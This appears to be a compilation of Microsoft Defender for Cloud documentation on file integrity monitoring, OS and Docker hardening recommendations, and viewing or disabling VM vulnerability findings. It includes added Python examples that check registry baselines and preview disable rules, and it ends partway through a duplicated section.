   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters


[Screenshot: the Add Windows Registry for Change Tracking pane, opened from the Windows Registry tab of Workspace Configuration. Fields: Item Name, Group (Custom), Windows Registry Key containing HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters, and an Enabled toggle.]


Track changes to Windows files 


1. In the Add Windows File for Change Tracking window, in the Enter path text box, 
enter the folder that contains the files that you want to track. In the example in the 
following figure, Contoso Web App resides in the D:\ drive within the 
ContosWebApp folder structure. 


2. Create a custom Windows file entry by providing a name of the setting class, 
enabling recursion, and specifying the top folder with a wildcard (*) suffix. 


[Screenshot: the Add Windows File for Change Tracking pane, opened from the Windows Files tab of Workspace Configuration. Fields: Item Name, Group (Custom), Enter Path, Path Type (File), Recursion (True/False), Upload file content (True/False), and an Enabled toggle.]


Retrieve change data 


File Integrity Monitoring data resides within the Azure Log Analytics
ConfigurationChange table set.

1. Set a time range to retrieve a summary of changes by resource.

   In the following example, we're retrieving all changes in the last 14 days in the
   categories of registry and files:

   ConfigurationChange
   | where TimeGenerated > ago(14d)
   | where ConfigChangeType in ('Registry', 'Files')
   | summarize count() by Computer, ConfigChangeType

2. To view details of the registry changes:
   a. Remove Files from the where clause.
   b. Remove the summarization line and replace it with an ordering clause:

   ConfigurationChange
   | where TimeGenerated > ago(14d)
   | where ConfigChangeType in ('Registry')
   | order by Computer, RegistryKey

Reports can be exported to CSV for archival and/or channeled to a Power BI report.


[Screenshot: the registry query above run in the contosoretail-it workspace (Time range: Set in query), completed in 00:00:01. The Export menu offers Export to CSV - All Columns, Export to CSV - Displayed Columns, and Export to Power BI (M Query). Result columns include Computer, ConfigChangeType, ChangeCategory, SourceComputerId, SoftwareType and SoftwareName; the rows shown are Registry changes of category Modified on computer retailEUS3.]
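The registry query above returns a change stream, not a verdict. The script below, an added example that is not part of this article or of Defender for Cloud, takes a CSV export of that query and checks every change under the Netlogon key against expected values for the settings listed in the custom registry check table. Computer, ConfigChangeType, ChangeCategory, RegistryKey and TimeGenerated are the columns shown in the article; ValueName, ValueData and PreviousValueData are assumed column names, the rows are constructed, and BASELINE is an assumed hardened configuration that you should replace with your own. It reports two things: values that are out of baseline now, and every event that moved a value out of baseline even if it was later restored, because a secure-channel setting that is switched off for a few hours and put back is exactly the kind of change FIM exists to surface.

```python
"""Check registry changes exported from ConfigurationChange against an expected Netlogon baseline.

Added example, not Microsoft's code. The CSV is constructed to resemble an 'Export to CSV'
of the article's registry query: Computer, ConfigChangeType, ChangeCategory, RegistryKey and
TimeGenerated are columns shown in the article; ValueName, ValueData and PreviousValueData
are assumed column names. BASELINE holds assumed expected values; replace with your own.
"""
import csv
import io

NETLOGON = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters"

# Assumed hardened baseline for the values in the custom registry check table:
# each entry is a predicate over the integer registry data.
BASELINE = {
    "RequireSignOrSeal":     lambda v: v == 1,   # always sign or seal secure channel data
    "SealSecureChannel":     lambda v: v == 1,
    "SignSecureChannel":     lambda v: v == 1,
    "RequireStrongKey":      lambda v: v == 1,
    "DisablePasswordChange": lambda v: v == 0,   # machine account password changes stay enabled
    "RefusePasswordChange":  lambda v: v == 0,
    "MaximumPasswordAge":    lambda v: 1 <= v <= 30,
}

# Constructed export: signing is switched off on 1 July and restored the next morning.
SAMPLE_CSV = r"""TimeGenerated,Computer,ConfigChangeType,ChangeCategory,RegistryKey,ValueName,ValueData,PreviousValueData
2023-07-01T10:00:00Z,retailEUS3,Registry,Modified,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters,RequireSignOrSeal,0,1
2023-07-01T10:00:05Z,retailEUS3,Registry,Modified,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters,MaximumPasswordAge,30,30
2023-07-02T08:15:00Z,retailEUS3,Registry,Modified,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters,RequireSignOrSeal,1,0
2023-07-02T09:00:00Z,retailEUS3,Registry,Added,HKEY_LOCAL_MACHINE\SOFTWARE\Contoso,Setting,5,
2023-07-02T09:30:00Z,retailEUS3,Files,Modified,,,,
"""


def netlogon_changes(csv_text):
    """Registry rows under the Netlogon key, oldest first."""
    rows = csv.DictReader(io.StringIO(csv_text))
    keep = [r for r in rows
            if r["ConfigChangeType"] == "Registry" and r["RegistryKey"].lower() == NETLOGON.lower()]
    return sorted(keep, key=lambda r: r["TimeGenerated"])


def out_of_baseline(row):
    """True when the row's new data violates BASELINE for a value we care about."""
    check = BASELINE.get(row["ValueName"])
    return check is not None and not check(int(row["ValueData"]))


def check_baseline(csv_text):
    """Return {'events': every change that left the baseline, 'current': values still out of baseline}.
    'current' alone would miss a setting that was weakened and later restored."""
    changes = netlogon_changes(csv_text)
    events = [(r["TimeGenerated"], r["Computer"], r["ValueName"], r["PreviousValueData"], r["ValueData"])
              for r in changes if out_of_baseline(r)]
    latest = {}
    for r in changes:  # later rows overwrite earlier ones, leaving the newest per value
        latest[(r["Computer"], r["ValueName"])] = r
    current = [(c, name, r["ValueData"]) for (c, name), r in latest.items() if out_of_baseline(r)]
    return {"events": events, "current": current}


if __name__ == "__main__":
    result = check_baseline(SAMPLE_CSV)
    print("out of baseline now:", result["current"])
    for when, host, name, old, new in result["events"]:
        print(f"{when} {host}: {name} changed {old} -> {new}")
```

On the constructed data the current state is clean, yet the events list shows RequireSignOrSeal set to 0 for about 22 hours; that window is what an investigator needs, and a query that only looks at the latest value per key would never show it.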


Next steps 


Learn more about Defender for Cloud in:

• Setting security policies - Learn how to configure security policies for your Azure
  subscriptions and resource groups.
• Managing security recommendations - Learn how recommendations help you
  protect your Azure resources.
• Azure Security blog - Get the latest Azure security news and information.


Review hardening recommendations 


Article e 08/30/2023 


O Note 


As the Log Analytics agent (also known as MMA) is set to retire in August 2024,
all Defender for Servers features that currently depend on it, including those
described on this page, will be available through either Microsoft Defender for
Endpoint integration or agentless scanning before the retirement date. For more
information about the roadmap for each of the features that currently rely on the
Log Analytics agent, see this announcement.


To reduce a machine's attack surface and avoid known risks, it's important to configure 
the operating system (OS) as securely as possible. 


The Microsoft cloud security benchmark has guidance for OS hardening, which has led 
to security baseline documents for Windows and Linux. 


Use the security recommendations described in this article to assess the machines in
your environment and:

• Identify gaps in the security configurations
• Learn how to remediate those gaps


Availability 


Aspect                          Details
Release state:                  Preview. The Azure Preview Supplemental Terms include additional legal terms
                                that apply to Azure features that are in beta, preview, or otherwise not yet
                                released into general availability.
Pricing:                        Free
Prerequisites:                  Machines must (1) be members of a workgroup, (2) have the Guest
                                Configuration extension, (3) have a system-assigned managed identity, and
                                (4) be running a supported OS:
                                • Windows Server 2012, 2012 R2, 2016 or 2019
                                • Ubuntu 14.04, 16.04, 17.04, 18.04 or 20.04
                                • Debian 7, 8, 9, or 10
                                • CentOS 7 or 8
                                • Red Hat Enterprise Linux (RHEL) 7 or 8
                                • Oracle Linux 7 or 8
                                • SUSE Linux Enterprise Server 12
Required roles and permissions: To install the Guest Configuration extension and its prerequisites, write
                                permission is required on the relevant machines.
                                To view the recommendations and explore the OS baseline data, read
                                permission is required at the subscription level.
Clouds:                         Commercial clouds; National (Azure Government, Microsoft Azure operated by
                                21Vianet)


What are the hardening recommendations? 


Microsoft Defender for Cloud includes two recommendations that check whether the
configuration of Windows and Linux machines in your environment meets the Azure
security baseline configurations:

• For Windows machines, Vulnerabilities in security configuration on your Windows
  machines should be remediated (powered by Guest Configuration) compares
  the configuration with the Windows security baseline.
• For Linux machines, Vulnerabilities in security configuration on your Linux
  machines should be remediated (powered by Guest Configuration) compares
  the configuration with the Linux security baseline.

These recommendations use the guest configuration feature of Azure Policy to compare
the OS configuration of a machine with the baseline defined in the Microsoft cloud
security benchmark.


Compare machines in your subscriptions with 
the OS security baselines 


To compare machines with the OS security baselines:

1. From Defender for Cloud's portal pages, open the Recommendations page.
2. Select the relevant recommendation:

   • For Windows machines, Vulnerabilities in security configuration on your
     Windows machines should be remediated (powered by Guest Configuration)
   • For Linux machines, Vulnerabilities in security configuration on your Linux
     machines should be remediated (powered by Guest Configuration)

[Screenshot: the Remediate security configurations control on the Recommendations page (Max score 4, Current score 0.69, Potential score increase +6% (3.31 points), 201 of 553 unhealthy resources), listing the Windows recommendation (16 of 116 VMs & servers) and the Linux recommendation (20 of 94 VMs & servers).]


3. On the recommendation details page you can see:
   a. The affected resources.
   b. The specific security checks that failed.

[Screenshot: recommendation details page for "Vulnerabilities in security configuration on your Windows machines should be remediated (powered by Guest Configuration)". Severity: Low. Freshness interval: 24 Hours. Sections: Description, Related recommendations (2), Remediation steps, Affected resources, Security checks. The Findings list has columns Rule Id, Security check, Policy category and Applies to; the rows shown, each applying to 16 of 16 resources:
- User Account Control: Behavior of the elevation prompt for standard users (Security Options - User Account Control)
- User Account Control: Behavior of the elevation prompt for administrators in Admin A... (Security Options - User Account Control)
- User Account Control: Admin Approval Mode for the Built-in Administrator account (Security Options - User Account Control)
- Devices: Allow undock without having to log on (Security Options - Devices)
- Turn off Internet Connection Wizard if URL connection is referring to Microsoft.com (Administrative Templates - System)
- Turn off Autoplay (Windows Components)
- Turn off app notifications on the lock screen (Administrative Templates - System)
- System: Specify the maximum log file size (KB) (Windows Components)
- Setup: Specify the maximum log file size (KB) (Windows Components)
- Set the default behavior for AutoRun (Windows Components)
The list is paginated across seven pages.]


4. To learn more about a specific finding, select it.

[Screenshot: details pane for the finding "Devices: Allow undock without having to log on", opened beside the Security checks list. Severity: Low. Freshness interval: 24 Hours. General information: Name Devices: Allow undock without having to log on; Category Security Options - Devices; Scan time 10/3/2021 11:43:05 AM (UTC). Impact: Users who have docked their computers will have to log on to the local console before they can undock their computers. For computers that do not have docking stations, this policy setting will have no impact. Vulnerability: If this policy setting is enabled, anyone with physical access to portable computers in docking stations could remove them and possibly tamper with them. Remediation: Disable the Devices: Allow undock without having to log on setting. Sections: Affected resources.]


5. Other investigation possibilities:

   • To view the list of machines that have been assessed, open Affected
     resources.
   • To view the list of findings for one machine, select a machine from the
     Unhealthy resources tab. A page will open listing only the findings for that
     machine.


Next steps 


In this document, you learned how to use Defender for Cloud's guest configuration
recommendations to compare the hardening of your OS with the Azure security
baseline.

To learn more about these configuration settings, see:

• Windows security baseline
• Linux security baseline
• Microsoft cloud security benchmark

Check out common questions about Defender for Servers.


Review Docker host hardening 
recommendations 
Microsoft Defender for Cloud identifies unmanaged containers hosted on IaaS Linux
VMs, or other Linux machines running Docker containers. Defender for Cloud
continuously assesses the configurations of these containers. It then compares them
with the Center for Internet Security (CIS) Docker Benchmark.

Defender for Cloud includes the entire ruleset of the CIS Docker Benchmark and alerts
you if your containers don't satisfy any of the controls. When it finds misconfigurations,
Defender for Cloud generates security recommendations. Use Defender for Cloud's
recommendations page to view recommendations and remediate issues.

When vulnerabilities are found, they're grouped inside a single recommendation.

Note

These CIS benchmark checks will not run on AKS-managed instances or Databricks-
managed VMs.


Availability 


Aspect                          Details
Release state:                  General availability (GA)
Pricing:                        Requires Microsoft Defender for Servers Plan 2
Required roles and permissions: Reader on the workspace to which the host connects
Clouds:                         Commercial clouds; National (Azure Government, Azure China 21Vianet);
                                Connected AWS accounts


Identify and remediate security vulnerabilities 
in your Docker configuration 


1. From Defender for Cloud's menu, open the Recommendations page.

2. Filter to the recommendation Vulnerabilities in container security configurations
should be remediated and select the recommendation.

The recommendation page shows the affected resources (Docker hosts).

[Screenshot: "Vulnerabilities in container security configurations should be remediated". Description: Remediate vulnerabilities in security configuration on machines with Docker installed to protect them from attacks. Sections: Remediation steps, Affected resources. Affected resources: Unhealthy resources (2), Healthy resources (0), Not applicable resources (0); the unhealthy container hosts are dockerVm-RedHat and DockerOnIaaSDemo, both in subscription yaProdTest2, resource group yaRG.]

Note

Machines that aren't running Docker will be shown in the Not applicable
resources tab. They'll appear in Azure Policy as Compliant.


3. To view and remediate the CIS controls that a specific host failed, select the host 
you want to investigate. 


Tip

If you started at the asset inventory page and reached this recommendation
from there, select the Take action button on the recommendation page.

Log Analytics opens with a custom operation ready to run. The default custom
query includes a list of all failed rules that were assessed, along with guidelines to
help you resolve the issues.


[Screenshot: Log Analytics query editor on workspace DefaultWorkspace-...-WEU, time range Custom, with the default query:]

SecurityBaseline
| where BaselineType == "Docker"
| where Computer == "DockerOnIaaSDemo" and AnalyzeResult == "Failed"
| summarize arg_max(TimeGenerated, *) by CceId
| project CceId, Description, Resource, ResourceGroup, RuleSeverity, ActualResult, BaselineType, Type, SubscriptionId, ...
| order by RuleSeverity asc nulls last

[Results: 23 records, completed in 00:00:02.844. The first rows shown, all with Resource DockerOnIaaSDemo in resource group yaRG:]

CceId        Description                                                                     RuleSeverity  ActualResult
CIS-CE-2-01  Ensure network traffic is restricted between containers on the default br...    Critical      Output of [/usr...
CIS-CE-2-02  Ensure the logging level is set to 'info'.                                      Critical      Wanted: log-lev...
CIS-CE-2-06  Ensure TLS authentication for Docker daemon is configured                       Critical      Wanted: tlsverif...
CIS-CE-3-09  Ensure that TLS CA certificate file ownership is set to root:root               Critical      tlscacert is misc...
CIS-CE-2-12  Ensure centralized and remote logging is configured                             Critical      Output of [/usr...
CIS-CE-2-14  Ensure live restore is Enabled                                                  Critical      Wanted: live-re...
CIS-CE-2-18  Ensure containers are restricted from acquiring new privileges.                 Critical      Wanted: no-nev...


4. Tweak the query parameters if necessary. 




5. When you're sure the command is appropriate and ready for your host, select Run. 
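Two details of the default query deserve a check before you act on its output. It filters on AnalyzeResult == "Failed" before it keeps the newest row per CceId, so if the custom time range spans more than one scan, a rule that failed in an older scan and passed in the latest one is still listed; and order by RuleSeverity sorts the label text alphabetically, not by severity. The Python below, added here and not Microsoft's code or query, processes a constructed export of the same table the other way round: newest result per rule first, then the Failed filter, then an explicit severity rank. The rule IDs and descriptions are those displayed above; the severity labels Warning and Informational, the second host, and the repeated-scan rows for CIS-CE-2-06 are assumptions made for the example.

```python
"""Post-process a SecurityBaseline export for Docker hosts: newest result per rule, then failed, then severity.

Added example, not Microsoft's code or query. The rows are constructed; the CIS rule
IDs and descriptions are those displayed in the article, the 'Warning' and
'Informational' severity labels are assumed, and CIS-CE-2-06 is given a later 'Passed'
row to show why filtering before arg_max reports a stale failure.
"""
import csv
import io

# Explicit rank so "Warning" sorts before "Informational"; a plain string sort would not do this.
SEVERITY_RANK = {"Critical": 0, "Warning": 1, "Informational": 2}  # assumed label set

SAMPLE_CSV = """TimeGenerated,Computer,BaselineType,CceId,Description,RuleSeverity,AnalyzeResult
2023-08-01T01:00:00Z,DockerOnIaaSDemo,Docker,CIS-CE-2-06,Ensure TLS authentication for Docker daemon is configured,Critical,Failed
2023-08-02T01:00:00Z,DockerOnIaaSDemo,Docker,CIS-CE-2-06,Ensure TLS authentication for Docker daemon is configured,Critical,Passed
2023-08-02T01:00:00Z,DockerOnIaaSDemo,Docker,CIS-CE-2-18,Ensure containers are restricted from acquiring new privileges.,Critical,Failed
2023-08-02T01:00:00Z,DockerOnIaaSDemo,Docker,CIS-CE-2-02,Ensure the logging level is set to 'info'.,Warning,Failed
2023-08-02T01:00:00Z,DockerOnIaaSDemo,Docker,CIS-CE-2-14,Ensure live restore is Enabled,Informational,Failed
2023-08-02T01:00:00Z,otherHost,Docker,CIS-CE-2-02,Ensure the logging level is set to 'info'.,Warning,Failed
"""


def _rows(csv_text, computer, **filters):
    """Rows for one Docker host, optionally restricted by column equality (e.g. AnalyzeResult='Failed')."""
    out = []
    for r in csv.DictReader(io.StringIO(csv_text)):
        if r["Computer"] != computer or r["BaselineType"] != "Docker":
            continue
        if all(r[k] == v for k, v in filters.items()):
            out.append(r)
    return out


def _newest_per_rule(rows):
    """Equivalent of summarize arg_max(TimeGenerated, *) by CceId."""
    latest = {}
    for r in rows:  # ISO-8601 timestamps in one format compare correctly as strings
        if r["CceId"] not in latest or r["TimeGenerated"] > latest[r["CceId"]]["TimeGenerated"]:
            latest[r["CceId"]] = r
    return latest


def current_failures(csv_text, computer):
    """Newest result per rule FIRST, then keep only rules whose newest result is Failed,
    ordered by severity rank and then rule ID."""
    latest = _newest_per_rule(_rows(csv_text, computer))
    failed = [r for r in latest.values() if r["AnalyzeResult"] == "Failed"]
    failed.sort(key=lambda r: (SEVERITY_RANK.get(r["RuleSeverity"], len(SEVERITY_RANK)), r["CceId"]))
    return failed


def stale_failures(csv_text, computer):
    """The portal query's order (filter Failed, then arg_max): rule IDs it would report
    that are no longer failing in the newest scan."""
    reported = set(_newest_per_rule(_rows(csv_text, computer, AnalyzeResult="Failed")))
    current = {r["CceId"] for r in current_failures(csv_text, computer)}
    return sorted(reported - current)


if __name__ == "__main__":
    for r in current_failures(SAMPLE_CSV, "DockerOnIaaSDemo"):
        print(f'{r["RuleSeverity"]:<13} {r["CceId"]:<12} {r["Description"]}')
    print("stale:", stale_failures(SAMPLE_CSV, "DockerOnIaaSDemo"))
```

The same correction can be made in the query itself by moving the AnalyzeResult filter below the summarize line; the severity ranking has no direct KQL equivalent without a lookup, which is why it is shown here in code.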


Next steps 


Docker hardening is just one aspect of Defender for Cloud's container security features.

Learn more about container security in Defender for Cloud.


View and remediate findings from 
vulnerability assessment solutions on 
your VMs 
When your vulnerability assessment tool reports vulnerabilities to Defender for Cloud,
Defender for Cloud presents the findings and related information as recommendations.
The findings include related information such as remediation steps, relevant
CVEs, CVSS scores, and more. You can view the identified vulnerabilities for one or more
subscriptions, or for a specific VM.


View findings from the scans of your virtual 
machines 


To view vulnerability assessment findings (from all of your configured scanners) and 
remediate identified vulnerabilities: 


1. From Defender for Cloud's menu, open the Recommendations page. 
2. Select the recommendation Machines should have vulnerability findings resolved. 


Defender for Cloud shows you all the findings for all VMs in the currently selected
subscriptions. The findings are ordered by severity.

[Screenshot: "Vulnerabilities in your virtual machines should be remediated", with sections Description, Remediation steps, Affected resources and Security Checks. Findings list:]

ID      Security Check               Category  Applies To        Severity
124586  Red Hat Linux Kernel Ke...   Local     1 of 9 resources  High
236587  Red Hat Update for linu...   RedHat    1 of 9 resources  High
236613  Red Hat Update for linu...   RedHat    1 of 9 resources  High
236173  Red Hat Update for util-...  RedHat    1 of 9 resources  Medium
370472  Linux Kernel Double Fet...   Local     1 of 9 resources  Low


3. To filter the findings by a specific VM, open the "Affected resources" section and
click the VM that interests you. Or you can select a VM from the resource health
view, and view all relevant recommendations for that resource.

Defender for Cloud shows the findings for that VM, ordered by severity.


4. To learn more about a specific vulnerability, select it. 


[Screenshot: finding 236366 "Red Hat Update for nss (RHSA-2017:1365)" selected from the findings list of resource "vm redhat" (64 total vulnerabilities). Impact: An attacker could use this flaw to crash a server application compiled against the NSS library. General information: ID 236366; Severity High; Category RedHat; Published Time 6/1/2017, 12:59 PM GMT+3; Time Generated 7/13/2020, 8:08 AM GMT+3; Patchable Yes; CVSS base score v2.0: 5, v3.0: 7.5; CVEs CVE-2017-7502. Further sections: Threat, Remediation, Additional References.]

The details pane that appears contains extensive information about the 
vulnerability, including: 


e Links to all relevant CVEs (where available) 
e Remediation steps 
e Any additional reference pages 


5. To remediate a finding, follow the remediation steps from this details pane. 


Disable specific findings 


If you have an organizational need to ignore a finding, rather than remediate it, you can
optionally disable it. Disabled findings don't impact your secure score or generate
unwanted noise.

When a finding matches the criteria you've defined in your disable rules, it won't appear
in the list of findings. Typical scenarios include:

• Disable findings with severity below medium
• Disable findings that are non-patchable
• Disable findings with CVSS score below 6.5
• Disable findings with specific text in the security check or category (for example,
  "RedHat", "CentOS Security Update for sudo")

Important

To create a rule, you need permissions to edit a policy in Azure Policy. Learn more
in Azure RBAC permissions in Azure Policy.


To create a rule:

1. From the recommendations detail page for Machines should have vulnerability
findings resolved, select Disable rule.
2. Select the relevant scope.
3. Define your criteria. You can use any of the following criteria:

   • Finding ID
   • Category
   • Security check
   • CVSS scores (v2, v3)
   • Severity
   • Patchable status

4. Select Apply rule.


[Screenshot: the Disable rule pane beside the recommendation's Findings and Disabled findings tabs. Heading: "Disable findings that match any of the following criteria:" with fields IDs, CVEs, Categories, Security checks, CVSS2 score less than, CVSS3 score less than, Minimum severity (None), a Non-patchable checkbox, Justification (optional), and Trigger Logic App.]


Important

Changes might take up to 24 hours to take effect.

5. To view, override, or delete a rule:
   a. Select Disable rule.
   b. From the scope list, subscriptions with active rules show as Rule applied.

[Screenshot: the Disable rule scope list covering 41 subscriptions, with the text "You can define a rule to disable one or more findings for this recommendation. Disabled findings won't be counted towards your secure score". Columns: Item, Current status, More. A subscription with an active rule shows Rule applied; its More menu offers View rule and Delete rule.]

   c. To view or delete the rule, select the ellipsis menu ("...").
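Because a rule disables every finding that matches any one of its criteria, a broad text criterion such as "RedHat" also silences High-severity, patchable findings, and nothing on the pane shows you that before you select Apply rule. The following Python, an added example rather than code from this article or the product, evaluates a candidate rule against a set of findings and lists what would be suppressed and why. The criteria mirror the fields on the Disable rule pane; finding 236366 uses the values shown in the details pane above, while the other two findings and the two rules are constructed.

```python
"""Preview what a vulnerability-finding disable rule would suppress.

Added example, not Microsoft's code. Criteria mirror the fields on the Disable rule pane
(IDs, categories, security checks, CVSS2/CVSS3 'less than', minimum severity,
non-patchable) with match-any semantics; finding 236366 uses the values shown in the
article's details pane, the other findings are constructed.
"""
from dataclasses import dataclass
from typing import Optional

SEVERITY_ORDER = {"Low": 0, "Medium": 1, "High": 2}


@dataclass(frozen=True)
class Finding:
    id: str
    security_check: str
    category: str
    severity: str
    cvss2: Optional[float]
    cvss3: Optional[float]
    patchable: bool


@dataclass(frozen=True)
class DisableRule:
    ids: frozenset = frozenset()
    categories: tuple = ()         # case-insensitive substring match on Finding.category
    security_checks: tuple = ()    # case-insensitive substring match on Finding.security_check
    cvss2_less_than: Optional[float] = None
    cvss3_less_than: Optional[float] = None
    minimum_severity: Optional[str] = None  # findings below this severity are disabled
    non_patchable: bool = False


def matching_criteria(rule, f):
    """Names of the rule's criteria that this finding satisfies; any one of them disables it."""
    hits = []
    if f.id in rule.ids:
        hits.append("id")
    if any(c.lower() in f.category.lower() for c in rule.categories):
        hits.append("category")
    if any(s.lower() in f.security_check.lower() for s in rule.security_checks):
        hits.append("security check")
    if rule.cvss2_less_than is not None and f.cvss2 is not None and f.cvss2 < rule.cvss2_less_than:
        hits.append("cvss2")
    if rule.cvss3_less_than is not None and f.cvss3 is not None and f.cvss3 < rule.cvss3_less_than:
        hits.append("cvss3")
    if rule.minimum_severity is not None and SEVERITY_ORDER[f.severity] < SEVERITY_ORDER[rule.minimum_severity]:
        hits.append("severity")
    if rule.non_patchable and not f.patchable:
        hits.append("non-patchable")
    return hits


def preview(rule, findings):
    """Return (suppressed, visible): suppressed is [(finding, reasons)], visible is [finding]."""
    suppressed, visible = [], []
    for f in findings:
        reasons = matching_criteria(rule, f)
        if reasons:
            suppressed.append((f, reasons))
        else:
            visible.append(f)
    return suppressed, visible


# Constructed findings; 236366 is the one shown in the article (CVSS v2 5, v3 7.5, patchable).
FINDINGS = [
    Finding("236366", "Red Hat Update for nss (RHSA-2017:1365)", "RedHat", "High", 5.0, 7.5, True),
    Finding("X-0001", "CentOS Security Update for sudo", "CentOS", "Medium", 4.3, 6.0, True),
    Finding("X-0002", "Kernel issue awaiting vendor fix", "Local", "Low", 2.1, 3.1, False),
]

# Broad text rule from the article's scenario list: it silences the High nss finding too.
RULE_TEXT = DisableRule(categories=("RedHat",))
# Risk-based rule: CVSS v3 below 6.5 or non-patchable only.
RULE_RISK = DisableRule(cvss3_less_than=6.5, non_patchable=True)


if __name__ == "__main__":
    for name, rule in (("text", RULE_TEXT), ("risk", RULE_RISK)):
        suppressed, visible = preview(rule, FINDINGS)
        print(name, "suppresses", [(f.id, f.severity, why) for f, why in suppressed],
              "leaves", [f.id for f in visible])
```

Feed it the findings exported for the scope you are about to apply the rule to, and read the suppressed list as the blast radius: the text rule hides the High nss finding, while the risk-based rule leaves it visible and hides only the two low-impact ones.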


Export the results 


To export vulnerability assessment results, you'll need to use Azure Resource Graph
(ARG). This tool provides instant access to resource information across your cloud
environments with robust filtering, grouping, and sorting capabilities. It's a quick and
efficient way to query information across Azure subscriptions programmatically or from
within the Azure portal.

For full instructions and a sample ARG query, see the following Tech Community post:
Exporting vulnerability assessment results in Microsoft Defender for Cloud.


Next steps 


This article described the Microsoft Defender for Cloud vulnerability assessment
extension (powered by Qualys) for scanning your VMs. For related material, see the
following articles:

• Learn about the different elements of a recommendation
• Learn how to remediate recommendations


View and remediate findings from 
vulnerability assessment solutions on 
your VMs 
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When your vulnerability assessment tool reports vulnerabilities to Defender for Cloud, 
Defender for Cloud presents the findings and related information as recommendations. 
In addition, the findings include related information such as remediation steps, relevant 
CVEs, CVSS scores, and more. You can view the identified vulnerabilities for one or more 
subscriptions, or for a specific VM. 


View findings from the scans of your virtual 
machines 


To view vulnerability assessment findings (from all of your configured scanners) and 
remediate identified vulnerabilities: 


1. From Defender for Cloud's menu, open the Recommendations page. 
2. Select the recommendation Machines should have vulnerability findings resolved. 


Defender for Cloud shows you all the findings for all VMs in the currently selected 
subscriptions. The findings are ordered by severity. 


Vulnerabilities in your virtual machines should be remediated 


v Description 


v Remediation steps 


[> gera resources | 


^ Security Checks 


Findings 


| Ø Search to filter items... 


ID Security Check Category Applies To 

124586 Red Hat Linux Kernel Ke... Local 1 of 9 resources 
236587 Red Hat Update for linu... RedHat 1 of 9 resources 
236613 Red Hat Update for linu... RedHat 1 of 9 resources 
236173 Red Hat Update for util-.. RedHat 1 of 9 resources 
370472 Linux Kernel Double Fet... Local 1 of 9 resources 


Severity 
@ High 
@ High 
@ High 
A Medium 


@ Low 


e 


3. To filter the findings by a specific VM, open the "Affected resources" section and 


click the VM that interests you. Or you can select a VM from the resource health 


view, and view all relevant recommendations for that resource. 


Defender for Cloud shows the findings for that VM, ordered by severity. 


4. To learn more about a specific vulnerability, select it. 


Dashboard > Security Center > Vulnerabilities in your virtual machines 236366-Red Hat Update for nss (RHSA-201... 
vmtredhat 


“ Description 


Resource Total vulnerabilities Red Hat Update for nss (RHSA-2017:1365) 


a vm redhat 64 


A^ Impact 


An attacker could use this flaw to crash a server application compiled against the 


NSS library. 
Findings 
7 ^ General information 
O Search to filter items... ID 236366 
D Security Check Severity @ High 
237861 Red Hat Update for nss, nss-s¢ Category RedHat 
(1/2017, 12:5 
236613 Red Hat Update for linux-firmv Published Time 6/1/2017, 12:59 PM GMT+3 
Time Generated 7/13/2020, 8:08 AM GMT+3 
237810 Red Hat Update for kernel (RH 
Patchable Yes 
236387 Red Hat Update for kernel (RH CVSS base score v2.0: 5 
236530 Red Hat Update for wpa_supp v3.0: 7.5 
236966 Red Hat Update for kernel (RH CVEs CVE-2017-7502 & 
236366 Red Hat Update for nss (RHSA 
236144 Red Hat Update for python (RI \ Threat 
237435 Red Hat Update for blktrace (F = Toy 
v Remediation 
237452 Red Hat Update for sssd (RHS. 


v Additional References 


The details pane that appears contains extensive information about the 
vulnerability, including: 


e Links to all relevant CVEs (where available) 
e Remediation steps 
e Any additional reference pages 


5. To remediate a finding, follow the remediation steps from this details pane. 


Disable specific findings 


If you have an organizational need to ignore a finding, rather than remediate it, you can 
optionally disable it. Disabled findings don't impact your secure score or generate 
unwanted noise. 


When a finding matches the criteria you've defined in your disable rules, it won't appear 
in the list of findings. Typical scenarios include: 


e Disable findings with severity below medium 

e Disable findings that are non-patchable 

e Disable findings with CVSS score below 6.5 

e Disable findings with specific text in the security check or category (for example, 
“RedHat”, “CentOS Security Update for sudo”) 


@ Important 


To create a rule, you need permissions to edit a policy in Azure Policy. Learn more 
in Azure RBAC permissions in Azure Policy. 


To create a rule: 


1. From the recommendations detail page for Machines should have vulnerability 
findings resolved £ , select Disable rule. 


2. Select the relevant scope. 
3. Define your criteria. You can use any of the following criteria: 


e Finding ID 

e Category 

e Security check 

e CVSS scores (v2, v3) 
e Severity 

e Patchable status 


4. Select Apply rule. 


Home > Microsoft Defender for Cloud > 


Disable rule 
Vulnerabilities in your virtual ma} STEE 


S Disable rule 


^ Description Disable Action 


Monitors for vulnerabilities on your virtual machines as disco 
ú Disable findings that match any of the following criteria: 


wv Remediation steps IDs © 


v Affected resources 


CVEs © 


^ Security Checks 


Findings Disabled findings Categories © 


Ø Search to filter items... 


Security checks © 


ID Security Check 


91674 Microsoft Wint CVSS2 score less than © 


91668 Microsoft Wint 


91609 Microsoft Win}  CVSS3 score less than © 


100400 Microsoft Inter 
Minimum severity © 


91653 Microsoft Wint 


None 


91622 Microsoft Wint 


L] Non-patchable © 


100410 Microsoft Inter 


91605 Microsoft Wint Justification (optional) 


Trigger Logic App 


@ Important 


Changes might take up to 24hrs to take effect. 


5. To view, override, or delete a rule: 
a. Select Disable rule. 
b. From the scope list, subscriptions with active rules show as Rule applied. 


[Screenshot: the Disable rule scope list. Subscriptions with an active rule show Rule applied; the ellipsis menu for a subscription offers View rule and Delete rule.]


c. To view or delete the rule, select the ellipsis menu ("..."). 
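A model of how such a rule is evaluated, added here as an example (this is not Microsoft's code and not the Defender for Cloud API; the Finding and DisableRule field names, the severity ordering and the sample findings are assumptions constructed for the illustration). It implements the "match any criterion" semantics the pane describes and adds the check a practitioner wants before applying a rule: which High or Critical findings a broad text criterion would silently remove from the secure score.

```python
from dataclasses import dataclass, field
from typing import Optional

# Severity order used for the "minimum severity" criterion (assumed ordering;
# the portal offers None/Low/Medium/High/Critical).
SEVERITY_RANK = {"Low": 1, "Medium": 2, "High": 3, "Critical": 4}


@dataclass
class Finding:
    """A vulnerability finding as surfaced per machine (field names assumed)."""
    finding_id: str
    category: str
    security_check: str
    severity: str
    cvss2: float
    cvss3: float
    patchable: bool


@dataclass
class DisableRule:
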